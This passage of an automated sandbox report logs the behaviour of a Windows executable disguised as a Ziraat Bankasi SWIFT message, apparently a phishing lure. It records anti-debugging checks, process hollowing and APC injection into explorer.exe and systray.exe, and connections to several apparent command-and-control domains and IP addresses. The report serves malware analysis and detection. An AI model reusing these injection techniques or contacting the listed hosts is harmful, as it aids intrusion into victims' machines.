Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_013314FB mov eax, dword ptr fs:[00000030h] 6_2_013314FB
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6CF0 mov eax, dword ptr fs:[00000030h] 6_2_012F6CF0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6CF0 mov eax, dword ptr fs:[00000030h] 6_2_012F6CF0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F6CF0 mov eax, dword ptr fs:[00000030h] 6_2_012F6CF0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348CD6 mov eax, dword ptr fs:[00000030h] 6_2_01348CD6
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01274F2E mov eax, dword ptr fs:[00000030h] 6_2_01274F2E
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01274F2E mov eax, dword ptr fs:[00000030h] 6_2_01274F2E
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B73D mov eax, dword ptr fs:[00000030h] 6_2_0129B73D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129B73D mov eax, dword ptr fs:[00000030h] 6_2_0129B73D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AE730 mov eax, dword ptr fs:[00000030h] 6_2_012AE730
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130FF10 mov eax, dword ptr fs:[00000030h] 6_2_0130FF10
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130FF10 mov eax, dword ptr fs:[00000030h] 6_2_0130FF10
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AA70E mov eax, dword ptr fs:[00000030h] 6_2_012AA70E
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AA70E mov eax, dword ptr fs:[00000030h] 6_2_012AA70E
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0134070D mov eax, dword ptr fs:[00000030h] 6_2_0134070D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0134070D mov eax, dword ptr fs:[00000030h] 6_2_0134070D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129F716 mov eax, dword ptr fs:[00000030h] 6_2_0129F716
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128FF60 mov eax, dword ptr fs:[00000030h] 6_2_0128FF60
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348F6A mov eax, dword ptr fs:[00000030h] 6_2_01348F6A
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128EF40 mov eax, dword ptr fs:[00000030h] 6_2_0128EF40
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7794 mov eax, dword ptr fs:[00000030h] 6_2_012F7794
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7794 mov eax, dword ptr fs:[00000030h] 6_2_012F7794
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F7794 mov eax, dword ptr fs:[00000030h] 6_2_012F7794
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01288794 mov eax, dword ptr fs:[00000030h] 6_2_01288794
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B37F5 mov eax, dword ptr fs:[00000030h] 6_2_012B37F5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127E620 mov eax, dword ptr fs:[00000030h] 6_2_0127E620
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132FE3F mov eax, dword ptr fs:[00000030h] 6_2_0132FE3F
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127C600 mov eax, dword ptr fs:[00000030h] 6_2_0127C600
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127C600 mov eax, dword ptr fs:[00000030h] 6_2_0127C600
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0127C600 mov eax, dword ptr fs:[00000030h] 6_2_0127C600
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A8E00 mov eax, dword ptr fs:[00000030h] 6_2_012A8E00
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AA61C mov eax, dword ptr fs:[00000030h] 6_2_012AA61C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012AA61C mov eax, dword ptr fs:[00000030h] 6_2_012AA61C
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01331608 mov eax, dword ptr fs:[00000030h] 6_2_01331608
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0128766D mov eax, dword ptr fs:[00000030h] 6_2_0128766D
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129AE73 mov eax, dword ptr fs:[00000030h] 6_2_0129AE73
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129AE73 mov eax, dword ptr fs:[00000030h] 6_2_0129AE73
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129AE73 mov eax, dword ptr fs:[00000030h] 6_2_0129AE73
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129AE73 mov eax, dword ptr fs:[00000030h] 6_2_0129AE73
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0129AE73 mov eax, dword ptr fs:[00000030h] 6_2_0129AE73
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01287E41 mov eax, dword ptr fs:[00000030h] 6_2_01287E41
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01287E41 mov eax, dword ptr fs:[00000030h] 6_2_01287E41
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01287E41 mov eax, dword ptr fs:[00000030h] 6_2_01287E41
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01287E41 mov eax, dword ptr fs:[00000030h] 6_2_01287E41
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01287E41 mov eax, dword ptr fs:[00000030h] 6_2_01287E41
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01287E41 mov eax, dword ptr fs:[00000030h] 6_2_01287E41
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133AE44 mov eax, dword ptr fs:[00000030h] 6_2_0133AE44
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0133AE44 mov eax, dword ptr fs:[00000030h] 6_2_0133AE44
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012F46A7 mov eax, dword ptr fs:[00000030h] 6_2_012F46A7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01340EA5 mov eax, dword ptr fs:[00000030h] 6_2_01340EA5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01340EA5 mov eax, dword ptr fs:[00000030h] 6_2_01340EA5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01340EA5 mov eax, dword ptr fs:[00000030h] 6_2_01340EA5
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0130FE87 mov eax, dword ptr fs:[00000030h] 6_2_0130FE87
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A16E0 mov ecx, dword ptr fs:[00000030h] 6_2_012A16E0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012876E2 mov eax, dword ptr fs:[00000030h] 6_2_012876E2
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_01348ED6 mov eax, dword ptr fs:[00000030h] 6_2_01348ED6
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012A36CC mov eax, dword ptr fs:[00000030h] 6_2_012A36CC
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B8EC7 mov eax, dword ptr fs:[00000030h] 6_2_012B8EC7
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_0132FEC0 mov eax, dword ptr fs:[00000030h] 6_2_0132FEC0
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Process queried: DebugPort Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Code function: 6_2_012B9910 NtAdjustPrivilegesToken,LdrInitializeThunk, 6_2_012B9910
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\explorer.exe Domain query: www.notarpucarhr.com
Source: C:\Windows\explorer.exe Domain query: www.oaksinstitute.net
Source: C:\Windows\explorer.exe Network Connect: 103.11.189.189 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.multimediapages.com
Source: C:\Windows\explorer.exe Network Connect: 141.136.43.229 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 38.239.92.131 80 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section unmapped: C:\Windows\SysWOW64\systray.exe base address: 1010000 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Section loaded: unknown target: C:\Windows\SysWOW64\systray.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Memory written: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Windows\SysWOW64\systray.exe Thread register set: target process: 3528 Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Process created: C:\Windows\SysWOW64\systray.exe C:\Windows\SysWOW64\systray.exe Jump to behavior
Source: explorer.exe, 00000007.00000000.374080606.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.394264558.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.331690721.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: EProgram Managerzx
Source: explorer.exe, 00000007.00000000.399124469.0000000005C70000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.374080606.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.350620618.000000000834F000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000007.00000000.374080606.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.394264558.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.331690721.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000007.00000000.330992667.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.393881656.00000000009C8000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000007.00000000.373733761.00000000009C8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Progmanath
Source: explorer.exe, 00000007.00000000.374080606.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.394264558.0000000000E50000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000007.00000000.331690721.0000000000E50000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Ziraat Bankasi Swift Mesaji20221129-34221.exe Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation Jump to behavior
